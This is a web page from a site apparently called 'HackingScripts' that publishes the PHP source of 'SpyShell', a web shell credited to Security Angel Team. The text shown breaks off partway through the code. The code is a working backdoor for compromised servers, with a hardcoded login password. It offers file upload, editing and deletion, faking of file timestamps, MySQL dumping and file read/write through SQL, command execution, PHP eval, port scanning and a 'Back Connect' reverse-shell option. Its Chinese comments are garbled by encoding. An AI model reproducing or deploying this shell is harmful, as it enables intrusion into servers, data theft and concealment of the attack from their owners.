HackingScripts

Hack Scripts for everybody

SpyShell Script

19 Feb 2014

SpyShell Script, powered by Security Angel Team [S4T].

SpyShell Script Source Code

   1 <?php
   2 error_reporting(7);
   3 @set_magic_quotes_runtime(0);
   4 ob_start();
   5 $mtime = explode(' ', microtime());
   6 $starttime = $mtime[1] + $mtime[0];
   7 define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
   8 define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
   9 define('IS_COM', class_exists('COM') ? 1 : 0 );
  10 define('IS_GPC', get_magic_quotes_gpc());
  11 $dis_func = get_cfg_var('disable_functions');
  12 define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
  13 @set_time_limit(0);
  14 
  15 foreach($_POST as $key => $value) {
  16    if (IS_GPC) {
  17        $value = s_array($value);
  18    }
  19    $$key = $value;
  20 }
  21 /*===================== ³ÌÐòÅäÖà =====================*/
  22 
  23 //echo encode_pass('angel');exit;
  24 //angel = ec38fe2a8497e0a8d6d349b3533038cb
  25 // Èç¹ûÐèÒªÃÜÂëÑéÖ¤,ÇëÐ޸ĵǽÃÜÂë,Áô¿ÕΪ²»ÐèÒªÑéÖ¤
  26 $pass  = 'ec38fe2a8497e0a8d6d349b3533038cb'; //angel
  27 
  28 //ÈçÄú¶Ô cookie ×÷Ó÷¶Î§ÓÐÌØÊâÒªÇó, »òµÇ¼²»Õý³£, ÇëÐÞ¸ÄÏÂÃæ±äÁ¿, ·ñÔòÇë±£³ÖĬÈÏ
  29 // cookie ǰ׺
  30 $cookiepre = '';
  31 // cookie ×÷ÓÃÓò
  32 $cookiedomain = '';
  33 // cookie ×÷Ó÷¾¶
  34 $cookiepath = '/';
  35 // cookie ÓÐЧÆÚ
  36 $cookielife = 86400;
  37 
  38 //³ÌÐòËÑË÷¿ÉдÎļþµÄÀàÐÍ
  39 !$writabledb && $writabledb = 'php,cgi,pl,asp,inc,js,html,htm,jsp';
  40 /*===================== ÅäÖýáÊø =====================*/
  41 
  42 $charsetdb = array('','armscii8','ascii','big5','binary','cp1250','cp1251','cp1256','cp1257','cp850','cp852','cp866','cp932','dec8','euc-jp','euc-kr','gb2312','gbk','geostd8','greek','hebrew','hp8','keybcs2','koi8r','koi8u','latin1','latin2','latin5','latin7','macce','macroman','sjis','swe7','tis620','ucs2','ujis','utf8');
  43 if ($charset == 'utf8') {
  44    header("content-Type: text/html; charset=utf-8");
  45 } elseif ($charset == 'big5') {
  46    header("content-Type: text/html; charset=big5");
  47 } elseif ($charset == 'gbk') {
  48    header("content-Type: text/html; charset=gbk");
  49 } elseif ($charset == 'latin1') {
  50    header("content-Type: text/html; charset=iso-8859-2");
  51 } elseif ($charset == 'euc-kr') {
  52    header("content-Type: text/html; charset=euc-kr");
  53 } elseif ($charset == 'euc-jp') {
  54    header("content-Type: text/html; charset=euc-jp");
  55 }
  56 
  57 $self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
  58 $timestamp = time();
  59 
  60 /*===================== Éí·ÝÑéÖ¤ =====================*/
  61 if ($action == "logout") {
  62    scookie('loginpass', '', -86400 * 365);
  63    @header('Location: '.$self);
  64    exit;
  65 }
  66 if($pass) {
  67    if ($action == 'login') {
  68        if ($pass == encode_pass($password)) {
  69            scookie('loginpass',encode_pass($password));
  70            @header('Location: '.$self);
  71            exit;
  72        }
  73    }
  74    if ($_COOKIE['loginpass']) {
  75        if ($_COOKIE['loginpass'] != $pass) {
  76            loginpage();
  77        }
  78    } else {
  79        loginpage();
  80    }
  81 }
  82 /*===================== ÑéÖ¤½áÊø =====================*/
  83 
  84 $errmsg = '';
  85 !$action && $action = 'file';
  86 
  87 // ²é¿´PHPINFO
  88 if ($action == 'phpinfo') {
  89    if (IS_PHPINFO) {
  90        phpinfo();
  91        exit;
  92    } else {
  93        $errmsg = 'phpinfo() function has non-permissible';
  94    }
  95 }
  96 
  97 // ÏÂÔØÎļþ
  98 if ($doing == 'downfile' && $thefile) {
  99    if (!@file_exists($thefile)) {
 100        $errmsg = 'The file you want Downloadable was nonexistent';
 101    } else {
 102        $fileinfo = pathinfo($thefile);
 103        header('Content-type: application/x-'.$fileinfo['extension']);
 104        header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
 105        header('Content-Length: '.filesize($thefile));
 106        @readfile($thefile);
 107        exit;
 108    }
 109 }
 110 
 111 // Ö±½ÓÏÂÔر¸·ÝÊý¾Ý¿â
 112 if ($doing == 'backupmysql' && !$saveasfile) {
 113    if (!$table) {
 114        $errmsg ='Please choose the table';
 115    } else {
 116        $mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
 117        $filename = basename($dbname.'.sql');
 118        header('Content-type: application/unknown');
 119        header('Content-Disposition: attachment; filename='.$filename);
 120        foreach($table as $k => $v) {
 121            if ($v) {
 122                sqldumptable($v);
 123            }
 124        }
 125        mysql_close();
 126        exit;
 127    }
 128 }
 129 
 130 // ͨ¹ýMYSQLÏÂÔØÎļþ
 131 if($doing=='mysqldown'){
 132    if (!$dbname) {
 133        $errmsg = 'Please input dbname';
 134    } else {
 135        $mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
 136        if (!file_exists($mysqldlfile)) {
 137            $errmsg = 'The file you want Downloadable was nonexistent';
 138        } else {
 139            $result = q("select load_file('$mysqldlfile');");
 140            if(!$result){
 141                q("DROP TABLE IF EXISTS tmp_angel;");
 142                q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
 143                //ÓÃʱ¼ä´ÁÀ´±íʾ½Ø¶Ï,±ÜÃâ³öÏÖ¶ÁÈ¡×ÔÉí»ò°üº¬__angel_1111111111_eof__µÄÎļþʱ²»ÍêÕûµÄÇé¿ö
 144                q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
 145                $result = q("select content from tmp_angel");
 146                q("DROP TABLE tmp_angel");
 147            }
 148            $row = @mysql_fetch_array($result);
 149            if (!$row) {
 150                $errmsg = 'Load file failed '.mysql_error();
 151            } else {
 152                $fileinfo = pathinfo($mysqldlfile);
 153                header('Content-type: application/x-'.$fileinfo['extension']);
 154                header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
 155                header("Accept-Length: ".strlen($row[0]));
 156                echo $row[0];
 157                exit;
 158            }
 159        }
 160    }
 161 }
 162 
 163 ?>
 164 <html>
 165 <head>
 166 <meta http-equiv="Content-Type" content="text/html; charset=gbk">
 167 <title><?php echo $action.' - '.$_SERVER['HTTP_HOST'];?></title>
 168 <style type="text/css">
 169 body,td{font: 12px Arial,Tahoma;line-height: 16px;}
 170 .input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
 171 .area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}
 172 .bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
 173 a {color: #00f;text-decoration:underline;}
 174 a:hover{color: #f00;text-decoration:none;}
 175 .alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 15px 5px 5px;}
 176 .alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 15px 5px 5px;}
 177 .focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 15px 5px 5px;}
 178 .head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 15px 5px 5px;font-weight:bold;}
 179 .head td span{font-weight:normal;}
 180 .infolist {padding:10px;margin:10px 0 20px 0;background:#F1F1F1;border:1px solid #ddd;}
 181 form{margin:0;padding:0;}
 182 h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
 183 ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
 184 u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
 185 .drives{padding:5px;}
 186 .drives span {margin:auto 7px;}
 187 </style>
 188 <script type="text/javascript">
 189 function CheckAll(form) {
 190    for(var i=0;i<form.elements.length;i++) {
 191        var e = form.elements[i];
 192        if (e.name != 'chkall')
 193        e.checked = form.chkall.checked;
 194     }
 195 }
 196 function $(id) {
 197    return document.getElementById(id);
 198 }
 199 function createdir(){
 200    var newdirname;
 201    newdirname = prompt('Please input the directory name:', '');
 202    if (!newdirname) return;
 203    $('createdir').newdirname.value=newdirname;
 204    $('createdir').submit();
 205 }
 206 function fileperm(pfile){
 207    var newperm;
 208    newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
 209    if (!newperm) return;
 210    $('fileperm').newperm.value=newperm;
 211    $('fileperm').pfile.value=pfile;
 212    $('fileperm').submit();
 213 }
 214 function copyfile(sname){
 215    var tofile;
 216    tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
 217    if (!tofile) return;
 218    $('copyfile').tofile.value=tofile;
 219    $('copyfile').sname.value=sname;
 220    $('copyfile').submit();
 221 }
 222 function rename(oldname){
 223    var newfilename;
 224    newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
 225    if (!newfilename) return;
 226    $('rename').newfilename.value=newfilename;
 227    $('rename').oldname.value=oldname;
 228    $('rename').submit();
 229 }
 230 function dofile(doing,thefile,m){
 231    if (m && !confirm(m)) {
 232        return;
 233    }
 234    $('filelist').doing.value=doing;
 235    if (thefile){
 236        $('filelist').thefile.value=thefile;
 237    }
 238    $('filelist').submit();
 239 }
 240 function createfile(nowpath){
 241    var filename;
 242    filename = prompt('Please input the file name:', '');
 243    if (!filename) return;
 244    opfile('editfile',nowpath + filename,nowpath);
 245 }
 246 function opfile(action,opfile,dir){
 247    $('fileopform').action.value=action;
 248    $('fileopform').opfile.value=opfile;
 249    $('fileopform').dir.value=dir;
 250    $('fileopform').submit();
 251 }
 252 function godir(dir,view_writable){
 253    if (view_writable) {
 254        $('godir').view_writable.value=view_writable;
 255    }
 256    $('godir').dir.value=dir;
 257    $('godir').submit();
 258 }
 259 function getsize(getdir,dir){
 260    $('getsize').getdir.value=getdir;
 261    $('getsize').dir.value=dir;
 262    $('getsize').submit();
 263 }
 264 function editrecord(action, base64, tablename){
 265    if (action == 'del') {      
 266        if (!confirm('Is or isn\'t deletion record?')) return;
 267    }
 268    $('recordlist').doing.value=action;
 269    $('recordlist').base64.value=base64;
 270    $('recordlist').tablename.value=tablename;
 271    $('recordlist').submit();
 272 }
 273 function moddbname(dbname) {
 274    if(!dbname) return;
 275    $('setdbname').dbname.value=dbname;
 276    $('setdbname').submit();
 277 }
 278 function settable(tablename,doing,page) {
 279    if(!tablename) return;
 280    if (doing) {
 281        $('settable').doing.value=doing;
 282    }
 283    if (page) {
 284        $('settable').page.value=page;
 285    }
 286    $('settable').tablename.value=tablename;
 287    $('settable').submit();
 288 }
 289 function s(action,nowpath,p1,p2,p3,p4,p5) {
 290    if(action) $('opform').action.value=action;
 291    if(nowpath) $('opform').nowpath.value=nowpath;
 292    if(p1) $('opform').p1.value=p1;
 293    if(p2) $('opform').p2.value=p2;
 294    if(p3) $('opform').p3.value=p3;
 295    if(p4) $('opform').p4.value=p4;
 296    if(p5) $('opform').p4.value=p5;
 297 }
 298 function g(action,nowpath,p1,p2,p3,p4,p5) {
 299    if(!action) return;
 300    s(action,nowpath,p1,p2,p3,p4,p5);
 301    $('opform').submit();
 302 }
 303 </script>
 304 </head>
 305 <body style="margin:0;table-layout:fixed; word-break:break-all">
 306 <?php
 307 formhead(array('name'=>'opform'));
 308 makehide('action', $action);
 309 makehide('nowpath', $nowpath);
 310 makehide('p1', $p1);
 311 makehide('p2', $p2);
 312 makehide('p3', $p3);
 313 makehide('p4', $p4);
 314 makehide('p5', $p5);
 315 formfoot();
 316 
 317 if(!function_exists('posix_getegid')) {
 318    $user = @get_current_user();
 319    $uid = @getmyuid();
 320    $gid = @getmygid();
 321    $group = "?";
 322 } else {
 323    $uid = @posix_getpwuid(@posix_geteuid());
 324    $gid = @posix_getgrgid(@posix_getegid());
 325    $user = $uid['name'];
 326    $uid = $uid['uid'];
 327    $group = $gid['name'];
 328    $gid = $gid['gid'];
 329 }
 330 
 331 ?>
 332 <table width="100%" border="0" cellpadding="0" cellspacing="0">
 333    <tr class="head">
 334        <td><span style="float:right;"><?php echo @php_uname();?> / User:<?php echo $uid.' ( '.$user.' ) / Group: '.$gid.' ( '.$group.' )';?></span><?php echo $_SERVER['HTTP_HOST'];?> (<?php echo gethostbyname($_SERVER['SERVER_NAME']);?>)</td>
 335    </tr>
 336    <tr class="alt1">
 337        <td>
 338            <span style="float:right;">PHP <?php echo PHP_VERSION;?> / Safe Mode:<?php echo getcfg('safe_mode');?></span>
 339            <a href="javascript:g('logout');">Logout</a> | 
 340            <a href="javascript:g('file');">File Manager</a> | 
 341            <a href="javascript:g('mysqladmin');">MYSQL Manager</a> | 
 342            <a href="javascript:g('sqlfile');">MySQL Upload &amp; Download</a> | 
 343            <a href="javascript:g('shell');">Execute Command</a> | 
 344            <a href="javascript:g('phpenv');">PHP Variable</a> | 
 345            <a href="javascript:g('portscan');">Port Scan</a> | 
 346            <a href="javascript:g('secinfo');">Security information</a> | 
 347            <a href="javascript:g('eval');">Eval PHP Code</a>
 348            <?php if (!IS_WIN) {?> | <a href="javascript:g('backconnect');">Back Connect</a><?php }?>
 349        </td>
 350    </tr>
 351 </table>
 352 <table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
 353 <?php
 354 $errmsg && m($errmsg);
 355 
 356 // »ñÈ¡µ±Ç°Â·¾¶
 357 if (!$dir) {
 358    $dir = $_SERVER["DOCUMENT_ROOT"] ? $_SERVER["DOCUMENT_ROOT"] : '.';
 359 }
 360 $nowpath = getPath(SA_ROOT, $dir);
 361 if (substr($dir, -1) != '/') {
 362    $dir = $dir.'/';
 363 }
 364 
 365 if ($action == 'file') {
 366 
 367    // Åж϶ÁдÇé¿ö
 368    $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
 369 
 370    // ´´½¨Ä¿Â¼
 371    if ($newdirname) {
 372        $mkdirs = $nowpath.$newdirname;
 373        if (file_exists($mkdirs)) {
 374            m('Directory has already existed');
 375        } else {
 376            m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
 377            @chmod($mkdirs,0777);
 378        }
 379    }
 380 
 381    // ÉÏ´«Îļþ
 382    elseif ($doupfile) {
 383        m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
 384    }
 385 
 386    // ±à¼­Îļþ
 387    elseif ($editfilename && $filecontent) {
 388        $fp = @fopen($editfilename,'w');
 389        m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
 390        @fclose($fp);
 391    }
 392 
 393    // ±à¼­ÎļþÊôÐÔ
 394    elseif ($pfile && $newperm) {
 395        if (!file_exists($pfile)) {
 396            m('The original file does not exist');
 397        } else {
 398            $newperm = base_convert($newperm,8,10);
 399            m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
 400        }
 401    }
 402 
 403    // ¸ÄÃû
 404    elseif ($oldname && $newfilename) {
 405        $nname = $nowpath.$newfilename;
 406        if (file_exists($nname) || !file_exists($oldname)) {
 407            m($nname.' has already existed or original file does not exist');
 408        } else {
 409            m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
 410        }
 411    }
 412 
 413    // ¸´ÖÆÎļþ
 414    elseif ($sname && $tofile) {
 415        if (file_exists($tofile) || !file_exists($sname)) {
 416            m('The goal file has already existed or original file does not exist');
 417        } else {
 418            m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
 419        }
 420    }
 421 
 422    // ¿Ë¡ʱ¼ä
 423    elseif ($curfile && $tarfile) {
 424        if (!@file_exists($curfile) || !@file_exists($tarfile)) {
 425            m('The goal file has already existed or original file does not exist');
 426        } else {
 427            $time = @filemtime($tarfile);
 428            m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
 429        }
 430    }
 431 
 432    // ×Ô¶¨Òåʱ¼ä
 433    elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
 434        if (!@file_exists($curfile)) {
 435            m(basename($curfile).' does not exist');
 436        } else {
 437            $time = strtotime("$year-$month-$day $hour:$minute:$second");
 438            m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
 439        }
 440    }
 441 
 442    // ÅúÁ¿É¾³ýÎļþ
 443    elseif($doing == 'delfiles') {
 444        if ($dl) {
 445            $dfiles='';
 446            $succ = $fail = 0;
 447            foreach ($dl as $filepath) {
 448                if (is_dir($filepath)) {
 449                    if (@deltree($filepath)) {
 450                        $succ++;
 451                    } else {
 452                        $fail++;
 453                    }
 454                } else {
 455                    if (@unlink($filepath)) {
 456                        $succ++;
 457                    } else {
 458                        $fail++;
 459                    }
 460                }
 461            }
 462            m('Deleted folder/file have finished,choose '.count($dl).' success '.$succ.' fail '.$fail);
 463        } else {
 464            m('Please select folder/file(s)');
 465        }
 466    }
 467 
 468    //²Ù×÷Íê±Ï
 469    formhead(array('name'=>'createdir'));
 470    makehide('newdirname');
 471    makehide('dir',$nowpath);
 472    formfoot();
 473    formhead(array('name'=>'fileperm'));
 474    makehide('newperm');
 475    makehide('pfile');
 476    makehide('dir',$nowpath);
 477    formfoot();
 478    formhead(array('name'=>'copyfile'));
 479    makehide('sname');
 480    makehide('tofile');
 481    makehide('dir',$nowpath);
 482    formfoot();
 483    formhead(array('name'=>'rename'));
 484    makehide('oldname');
 485    makehide('newfilename');
 486    makehide('dir',$nowpath);
 487    formfoot();
 488    formhead(array('name'=>'fileopform', 'target'=>'_blank'));
 489    makehide('action');
 490    makehide('opfile');
 491    makehide('dir');
 492    formfoot();
 493    formhead(array('name'=>'getsize'));
 494    makehide('getdir');
 495    makehide('dir');
 496    formfoot();
 497 
 498    $free = @disk_free_space($nowpath);
 499    !$free && $free = 0;
 500    $all = @disk_total_space($nowpath);
 501    !$all && $all = 0;
 502    $used = $all-$free;
 503    p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.@round(100/($all/$free),2).'%)</h2>');
 504 
 505    $cwd_links = '';
 506    $path = explode('/', $nowpath);
 507    $n=count($path);
 508    for($i=0;$i<$n-1;$i++) {
 509        $cwd_links .= '<a href="javascript:godir(\'';
 510        for($j=0;$j<=$i;$j++) {
 511            $cwd_links .= $path[$j].'/';
 512        }
 513        $cwd_links .= '\');">'.$path[$i].'/</a>';
 514    }
 515 
 516 ?>
 517 <script type="text/javascript">
 518 document.onclick = shownav;
 519 function shownav(e){
 520    var src = e?e.target:event.srcElement;
 521    do{
 522        if(src.id =="jumpto") {
 523            $('inputnav').style.display = "";
 524            $('pathnav').style.display = "none";
 525            //hidenav();
 526            return;
 527        }
 528        if(src.id =="inputnav") {
 529            return;
 530        }
 531        src = src.parentNode;
 532    }while(src.parentNode)
 533 
 534    $('inputnav').style.display = "none";
 535    $('pathnav').style.display = "";
 536 }
 537 </script>
 538 <div style="background:#eee;margin-bottom:10px;">
 539    <table id="pathnav" width="100%" border="0" cellpadding="5" cellspacing="0">
 540        <tr>
 541            <td width="100%"><?php echo $cwd_links.' - '.getChmod($nowpath).' / '.getPerms($nowpath).getUser($nowpath);?> (<?php echo $dir_writeable;?>)</td>
 542            <td nowrap><input class="bt" id="jumpto" name="jumpto" value="Jump to" type="button"></td>
 543        </tr>
 544    </table>
 545    <table id="inputnav" width="100%" border="0" cellpadding="5" cellspacing="0" style="display:none;">
 546    <form action="" method="post" id="godir" name="godir">
 547        <tr>
 548            <td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>
 549            <td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:99%;margin:0 8px;"></td>
 550            <td nowrap><input class="bt" value="GO" type="submit"></td>
 551        </tr>
 552    </form>
 553    </table>
 554 <?php
 555    if (IS_WIN && IS_COM) {
 556        $obj = new COM('scripting.filesystemobject');
 557        if ($obj && is_object($obj) && $obj->Drives) {
 558            echo '<div class="drives">';
 559            $DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
 560            $comma = '';
 561            foreach($obj->Drives as $drive) {
 562                if ($drive->Path) {
 563                    p($comma.'<a href="javascript:godir(\''.$drive->Path.'/\');">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
 564                    $comma = '<span>|</span>';
 565                }
 566            }
 567            echo '</div>';
 568        }
 569    }
 570 ?>
 571 </div>
 572 <?php
 573    $findstr = $_POST['findstr'];
 574    $re = $_POST['re'];
 575    tbhead();
 576    p('<tr class="alt1"><td colspan="7" style="padding:5px;line-height:20px;">');
 577    p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="bt" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$nowpath.'" type="hidden" /><input name="dir" value="'.$nowpath.'" type="hidden" /></div></form>');
 578    p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');
 579    p(' | <a href="javascript:godir(\'.\');">ScriptPath</a>');
 580    p(' | <a href="javascript:godir(\''.$nowpath.'\');">View All</a>');
 581    p(' | View Writable ( <a href="javascript:godir(\''.$nowpath.'\',\'dir\');">Directory</a>');
 582    p(' | <a href="javascript:godir(\''.$nowpath.'\',\'file\');">File</a> )');
 583    p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');
 584 
 585    p('<div style="padding:5px 0;"><form action="'.$self.'" method="POST">Find string in files(current folder): <input class="input" name="findstr" value="'.$findstr.'" type="text" /> <input class="bt" value="Find" type="submit" /> Type: <input class="input" name="writabledb" value="'.$writabledb.'" type="text" /><input name="dir" value="'.$dir.'" type="hidden" /> <input name="re" value="1" type="checkbox" '.($re ? 'checked' : '').' /> Regular expressions</form></div></td></tr>');
 586 
 587    p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
 588 
 589    //²é¿´ËùÓпÉдÎļþºÍĿ¼
 590    $dirdata=array();
 591    $filedata=array();
 592 
 593    if ($view_writable == 'dir') {
 594        $dirdata = GetWDirList($nowpath);
 595        $filedata = array();
 596    } elseif ($view_writable == 'file') {
 597        $dirdata = array();
 598        $filedata = GetWFileList($nowpath);
 599    } elseif ($findstr) {
 600        $dirdata = array();
 601        $filedata = GetSFileList($nowpath, $findstr, $re);
 602    } else {
 603        // Ŀ¼Áбí
 604        //scandir()ЧÂʸü¸ß
 605        $dirs=@opendir($dir);
 606        while ($file=@readdir($dirs)) {
 607            $filepath=$nowpath.$file;
 608            if(@is_dir($filepath)){
 609                $dirdb['filename']=$file;
 610                $dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
 611                $dirdb['dirchmod']=getChmod($filepath);
 612                $dirdb['dirperm']=getPerms($filepath);
 613                $dirdb['fileowner']=getUser($filepath);
 614                $dirdb['dirlink']=$nowpath;
 615                $dirdb['server_link']=$filepath;
 616                $dirdata[]=$dirdb;
 617            } else {       
 618                $filedb['filename']=$file;
 619                $filedb['size']=sizecount(@filesize($filepath));
 620                $filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
 621                $filedb['filechmod']=getChmod($filepath);
 622                $filedb['fileperm']=getPerms($filepath);
 623                $filedb['fileowner']=getUser($filepath);
 624                $filedb['dirlink']=$nowpath;
 625                $filedb['server_link']=$filepath;
 626                $filedata[]=$filedb;
 627            }
 628        }// while
 629        unset($dirdb);
 630        unset($filedb);
 631        @closedir($dirs);
 632    }
 633    @sort($dirdata);
 634    @sort($filedata);
 635    $dir_i = '0';
 636 
 637    p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
 638    makehide('action','file');
 639    makehide('thefile');
 640    makehide('doing');
 641    makehide('dir',$nowpath);
 642 
 643    foreach($dirdata as $key => $dirdb){
 644        if($dirdb['filename']!='..' && $dirdb['filename']!='.') {
 645            if($getdir && $getdir == $dirdb['server_link']) {
 646                $attachsize = dirsize($dirdb['server_link']);
 647                $attachsize = is_numeric($attachsize) ? sizecount($attachsize) : 'Unknown';
 648            } else {
 649                $attachsize = '<a href="javascript:getsize(\''.$dirdb['server_link'].'\',\''.$dir.'\');">Stat</a>';
 650            }
 651            $thisbg = bg();
 652            p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
 653            p('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="'.$dirdb['server_link'].'"></td>');
 654            p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');
 655            p('<td nowrap><a href="javascript:opfile(\'newtime\',\''.$dirdb['server_link'].'\',\''.$dirdb['dirlink'].'\');">'.$dirdb['mtime'].'</a></td>');
 656            p('<td nowrap>'.$attachsize.'</td>');
 657            p('<td nowrap>');
 658            p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');
 659            p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');
 660            p('<td nowrap><a href="javascript:rename(\''.$dirdb['server_link'].'\');">Rename</a></td>');
 661            p('</tr>');
 662            $dir_i++;
 663        } else {
 664            if($dirdb['filename']=='..') {
 665                p('<tr class='.bg().'>');
 666                p('<td align="center">-</td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Parent Directory</a></td>');
 667                p('</tr>');
 668            }
 669        }
 670    }
 671 
 672    p('<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>');
 673    $file_i = '0';
 674 
 675    foreach($filedata as $key => $filedb){
 676        if($filedb['filename']!='..' && $filedb['filename']!='.') {
 677            $fileurl = str_replace($_SERVER["DOCUMENT_ROOT"],'',$filedb['server_link']);
 678            $thisbg = bg();
 679            p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
 680            p('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="'.$filedb['server_link'].'"></td>');
 681            p('<td>'.((strpos($filedb['server_link'], $_SERVER["DOCUMENT_ROOT"]) !== false) ? '<a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a>' : $filedb['filename']).'</td>');
 682            p('<td nowrap><a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">'.$filedb['mtime'].'</a></td>');
 683            p('<td nowrap>'.$filedb['size'].'</td>');
 684            p('<td nowrap>');
 685            p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
 686            p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
 687            p('<td nowrap>');
 688            p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">Down</a> | ');
 689            p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> | ');
 690            p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Edit</a> | ');
 691            p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a>');
 692            p('</td></tr>');
 693            $file_i++;
 694        }
 695    }
 696    p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
 697    p('<tr class="'.bg().'"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td colspan="4"><a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
 698    p('</form></table>');
 699 }// end dir
 700 
 701 elseif ($action == 'sqlfile') {
 702    if($doing=="mysqlupload"){
 703        $file = $_FILES['uploadfile'];
 704        $filename = $file['tmp_name'];
 705        if (file_exists($savepath)) {
 706            m('The goal file has already existed');
 707        } else {
 708            if(!$filename) {
 709                m('Please choose a file');
 710            } else {
 711                $fp=@fopen($filename,'r');
 712                $contents=@fread($fp, filesize($filename));
 713                @fclose($fp);
 714                $contents = bin2hex($contents);
 715                if(!$upname) $upname = $file['name'];
 716                $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
 717                $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
 718                m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());
 719            }
 720        }
 721    }
 722 ?>
 723 <script type="text/javascript">
 724 function mysqlfile(doing){
 725    if(!doing) return;
 726    $('doing').value=doing;
 727    $('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
 728    $('mysqlfile').dbport.value=$('dbinfo').dbport.value;
 729    $('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
 730    $('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
